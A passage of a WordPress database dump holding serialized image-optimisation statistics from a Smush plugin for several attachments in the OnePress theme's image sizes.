blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.95999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:910;s:11:\"size_before\";i:13078;s:10:\"size_after\";i:12168;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4099,2527,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:6.25470829496944791259238627390004694461822509765625;s:5:\"bytes\";i:5978;s:11:\"size_before\";i:95576;s:10:\"size_after\";i:89598;s:4:\"time\";d:0.060000000000000004718447854656915296800434589385986328125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.769999999999999573674358543939888477325439453125;s:5:\"bytes\";i:439;s:11:\"size_before\";i:7612;s:10:\"size_after\";i:7173;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.20999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:962;s:11:\"size_before\";i:15494;s:10:\"size_after\";i:14532;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.28000000000000024868995751603506505489349365234375;s:5:\"bytes\";i:915;s:11:\"size_before\";i:14573;s:10:\"size_after\";i:13658;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.21999999999999975131004248396493494510650634765625;s:5:\"bytes\";i:1598;s:11:\"size_before\";i:25681;s:10:\"size_after\";i:24083;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.410000000000000142108547152020037174224853515625;s:5:\"bytes\";i:2064;s:11:\"size_before\";i:32216;s:10:\"size_after\";i:30152;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4100,2524,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:0.4807383455748517331329594526323489844799041748046875;s:5:\"bytes\";i:898;s:11:\"size_before\";i:186796;s:10:\"size_after\";i:185898;s:4:\"time\";d:0.50000000000000011102230246251565404236316680908203125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:6761;s:10:\"size_after\";i:6761;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:1.729999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:252;s:11:\"size_before\";i:14535;s:10:\"size_after\";i:14283;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:68170;s:10:\"size_after\";i:68170;s:4:\"time\";d:0.2200000000000000011102230246251565404236316680908203125;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:14241;s:10:\"size_after\";i:14241;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.020000000000000017763568394002504646778106689453125;s:5:\"bytes\";i:646;s:11:\"size_before\";i:31954;s:10:\"size_after\";i:31308;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:51135;s:10:\"size_after\";i:51135;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;}}}'),(4101,2523,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:46774;s:10:\"size_after\";i:46774;s:4:\"time\";d:0.12000000000000000943689570931383059360086917877197265625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:3:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:8458;s:10:\"size_after\";i:8458;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:19261;s:10:\"size_after\";i:19261;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:19055;s:10:\"size_after\";i:19055;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}}}'),(4102,2522,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:466412;s:10:\"size_after\";i:466412;s:4:\"time\";d:0.729999999999999982236431605997495353221893310546875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:12968;s:10:\"size_after\";i:12968;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:33633;s:10:\"size_after\";i:33633;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:176951;s:10:\"size_after\";i:176951;s:4:\"time\";d:0.320000000000000006661338147750939242541790008544921875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:33148;s:10:\"size_after\";i:33148;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:79065;s:10:\"size_after\";i:79065;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:130647;s:10:\"size_after\";i:130647;s:4:\"time\";d:0.179999999999999993338661852249060757458209991455078125;}}}'),(4103,2521,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:573967;s:10:\"size_after\";i:573967;s:4:\"time\";d:0.70000000000000006661338147750939242541790008544921875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:19793;s:10:\"size_after\";i:19793;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:42428;s:10:\"size_after\";i:42428;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:220310;s:10:\"size_after\";i:220310;s:4:\"time\";d:0.270000000000000017763568394002504646778106689453125;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:37553;s:10:\"size_after\";i:37553;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:96216;s:10:\"size_after\";i:96216;s:4:\"time\";d:0.1700000000000000122124532708767219446599483489990234375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:157667;s:10:\"size_after\";i:157667;s:4:\"time\";d:0.1499999999999999944488848768742172978818416595458984375;}}}'),(4104,2520,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:370705;s:10:\"size_after\";i:370705;s:4:\"time\";d:0.59999999999999997779553950749686919152736663818359375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:10563;s:10:\"size_after\";i:10563;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:27254;s:10:\"size_after\";i:27254;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:140389;s:10:\"size_after\";i:140389;s:4:\"time\";d:0.2399999999999999911182158029987476766109466552734375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:26969;s:10:\"size_after\";i:26969;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:62013;s:10:\"size_after\";i:62013;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:103517;s:10:\"size_after\";i:103517;s:4:\"time\";d:0.179999999999999993338661852249060757458209991455078125;}}}'),(4105,2519,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:357274;s:10:\"size_after\";i:357274;s:4:\"time\";d:0.70000000000000006661338147750939242541790008544921875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:13788;s:10:\"size_after\";i:13788;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:28610;s:10:\"size_after\";i:28610;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:142061;s:10:\"size_after\";i:142061;s:4:\"time\";d:0.299999999999999988897769753748434595763683319091796875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:19918;s:10:\"size_after\";i:19918;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:57894;s:10:\"size_after\";i:57894;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:95003;s:10:\"size_after\";i:95003;s:4:\"time\";d:0.1600000000000000033306690738754696212708950042724609375;}}}'),(4106,2518,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:0.02756339581036383601375661100973957218229770660400390625;s:5:\"bytes\";i:86;s:11:\"size_before\";i:312008;s:10:\"size_after\";i:311922;s:4:\"time\";d:0.5900000000000000799360577730112709105014801025390625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:0.770000000000000017763568394002504646778106689453125;s:5:\"bytes\";i:86;s:11:\"size_before\";i:11128;s:10:\"size_after\";i:11042;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:25151;s:10:\"size_after\";i:25151;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:114338;s:10:\"size_after\";i:114338;s:4:\"time\";d:0.2099999999999999922284388276239042170345783233642578125;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:24970;s:10:\"size_after\";i:24970;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:53595;s:10:\"size_after\";i:53595;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:82826;s:10:\"size_after\";i:82826;s:4:\"time\";d:0.1700000000000000122124532708767219446599483489990234375;}}}'),(4107,2517,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:697465;s:10:\"size_after\";i:697465;s:4:\"time\";d:1.0300000000000000266453525910037569701671600341796875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:19912;s:10:\"size_after\";i:19912;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:50520;s:10:\"size_after\";i:50520;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:273315;s:10:\"size_after\";i:273315;s:4:\"time\";d:0.440000000000000002220446049250313080847263336181640625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:42901;s:10:\"size_after\";i:42901;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:115727;s:10:\"size_after\";i:115727;s:4:\"time\";d:0.2200000000000000011102230246251565404236316680908203125;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:195090;s:10:\"size_after\";i:195090;s:4:\"time\";d:0.2099999999999999922284388276239042170345783233642578125;}}}'),(4108,2516,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:0.04708297002117591001368879233268671669065952301025390625;s:5:\"bytes\";i:412;s:11:\"size_before\";i:875051;s:10:\"size_after\";i:874639;s:4:\"time\";d:0.7199999999999999733546474089962430298328399658203125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:1.3200000000000000621724893790087662637233734130859375;s:5:\"bytes\";i:412;s:11:\"size_before\";i:31245;s:10:\"size_after\";i:30833;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:64357;s:10:\"size_after\";i:64357;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:329768;s:10:\"size_after\";i:329768;s:4:\"time\";d:0.25;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:61139;s:10:\"size_after\";i:61139;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:147445;s:10:\"size_after\";i:147445;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:241097;s:10:\"size_after\";i:241097;s:4:\"time\";d:0.2200000000000000011102230246251565404236316680908203125;}}}'),(4109,2515,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:530203;s:10:\"size_after\";i:530203;s:4:\"time\";d:0.63000000000000000444089209850062616169452667236328125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:18465;s:10:\"size_after\";i:18465;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:39404;s:10:\"size_after\";i:39404;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:196184;s:10:\"size_after\";i:196184;s:4:\"time\";d:0.2200000000000000011102230246251565404236316680908203125;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:39266;s:10:\"size_after\";i:39266;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:91408;s:10:\"size_after\";i:91408;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:145476;s:10:\"size_after\";i:145476;s:4:\"time\";d:0.2099999999999999922284388276239042170345783233642578125;}}}'),(4110,2514,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:7.49196741637447161110685556195676326751708984375;s:5:\"bytes\";i:22478;s:11:\"size_before\";i:300028;s:10:\"size_after\";i:277550;s:4:\"time\";d:0.6999999999999999555910790149937383830547332763671875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.03999999999999914734871708787977695465087890625;s:5:\"bytes\";i:2417;s:11:\"size_before\";i:13401;s:10:\"size_after\";i:10984;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.1500000000000003552713678800500929355621337890625;s:5:\"bytes\";i:3216;s:11:\"size_before\";i:26474;s:10:\"size_after\";i:23258;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:1.5300000000000000266453525910037569701671600341796875;s:5:\"bytes\";i:1696;s:11:\"size_before\";i:110841;s:10:\"size_after\";i:109145;s:4:\"time\";d:0.25;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.17999999999999971578290569595992565155029296875;s:5:\"bytes\";i:3822;s:11:\"size_before\";i:21019;s:10:\"size_after\";i:17197;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.4199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:6381;s:11:\"size_before\";i:51368;s:10:\"size_after\";i:44987;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.42999999999999971578290569595992565155029296875;s:5:\"bytes\";i:4946;s:11:\"size_before\";i:76925;s:10:\"size_after\";i:71979;s:4:\"time\";d:0.190000000000000002220446049250313080847263336181640625;}}}'),(4111,2513,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:3.75476621638341168107899648020975291728973388671875;s:5:\"bytes\";i:13353;s:11:\"size_before\";i:355628;s:10:\"size_after\";i:342275;s:4:\"time\";d:0.79000000000000003552713678800500929355621337890625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.17999999999999971578290569595992565155029296875;s:5:\"bytes\";i:1976;s:11:\"size_before\";i:13933;s:10:\"size_after\";i:11957;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:14;s:5:\"bytes\";i:4118;s:11:\"size_before\";i:29411;s:10:\"size_after\";i:25293;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:129552;s:10:\"size_after\";i:129552;s:4:\"time\";d:0.340000000000000024424906541753443889319896697998046875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.5;s:5:\"bytes\";i:4452;s:11:\"size_before\";i:25439;s:10:\"size_after\";i:20987;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.54999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:2807;s:11:\"size_before\";i:61643;s:10:\"size_after\";i:58836;s:4:\"time\";d:0.1600000000000000033306690738754696212708950042724609375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:95650;s:10:\"size_after\";i:95650;s:4:\"time\";d:0.1499999999999999944488848768742172978818416595458984375;}}}'),(4112,2512,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:1.105500397725598826781379102612845599651336669921875;s:5:\"bytes\";i:9381;s:11:\"size_before\";i:848575;s:10:\"size_after\";i:839194;s:4:\"time\";d:0.649999999999999911182158029987476766109466552734375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.03999999999999914734871708787977695465087890625;s:5:\"bytes\";i:2482;s:11:\"size_before\";i:30884;s:10:\"size_after\";i:28402;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.29999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:2723;s:11:\"size_before\";i:63268;s:10:\"size_after\";i:60545;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:324930;s:10:\"size_after\";i:324930;s:4:\"time\";d:0.2200000000000000011102230246251565404236316680908203125;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.019999999999999573674358543939888477325439453125;s:5:\"bytes\";i:2055;s:11:\"size_before\";i:51173;s:10:\"size_after\";i:49118;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:1.479999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:2121;s:11:\"size_before\";i:143409;s:10:\"size_after\";i:141288;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:234911;s:10:\"size_after\";i:234911;s:4:\"time\";d:0.190000000000000002220446049250313080847263336181640625;}}}'),(4113,2511,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:0.876495607584370173270826853695325553417205810546875;s:5:\"bytes\";i:3087;s:11:\"size_before\";i:352198;s:10:\"size_after\";i:349111;s:4:\"time\";d:0.59999999999999997779553950749686919152736663818359375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:0.91000000000000003108624468950438313186168670654296875;s:5:\"bytes\";i:108;s:11:\"size_before\";i:11923;s:10:\"size_after\";i:11815;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.87999999999999989341858963598497211933135986328125;s:5:\"bytes\";i:1064;s:11:\"size_before\";i:27403;s:10:\"size_after\";i:26339;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:129902;s:10:\"size_after\";i:129902;s:4:\"time\";d:0.190000000000000002220446049250313080847263336181640625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.859999999999999875655021241982467472553253173828125;s:5:\"bytes\";i:776;s:11:\"size_before\";i:27092;s:10:\"size_after\";i:26316;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:1.899999999999999911182158029987476766109466552734375;s:5:\"bytes\";i:1139;s:11:\"size_before\";i:59849;s:10:\"size_after\";i:58710;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:96029;s:10:\"size_after\";i:96029;s:4:\"time\";d:0.2099999999999999922284388276239042170345783233642578125;}}}'),(4114,2509,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:243208;s:10:\"size_after\";i:243208;s:4:\"time\";d:0.46000000000000007549516567451064474880695343017578125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:8544;s:10:\"size_after\";i:8544;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:18934;s:10:\"size_after\";i:18934;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:89744;s:10:\"size_after\";i:89744;s:4:\"time\";d:0.190000000000000002220446049250313080847263336181640625;}s:19:\"onepress-blog-small\";O:8:\"stdC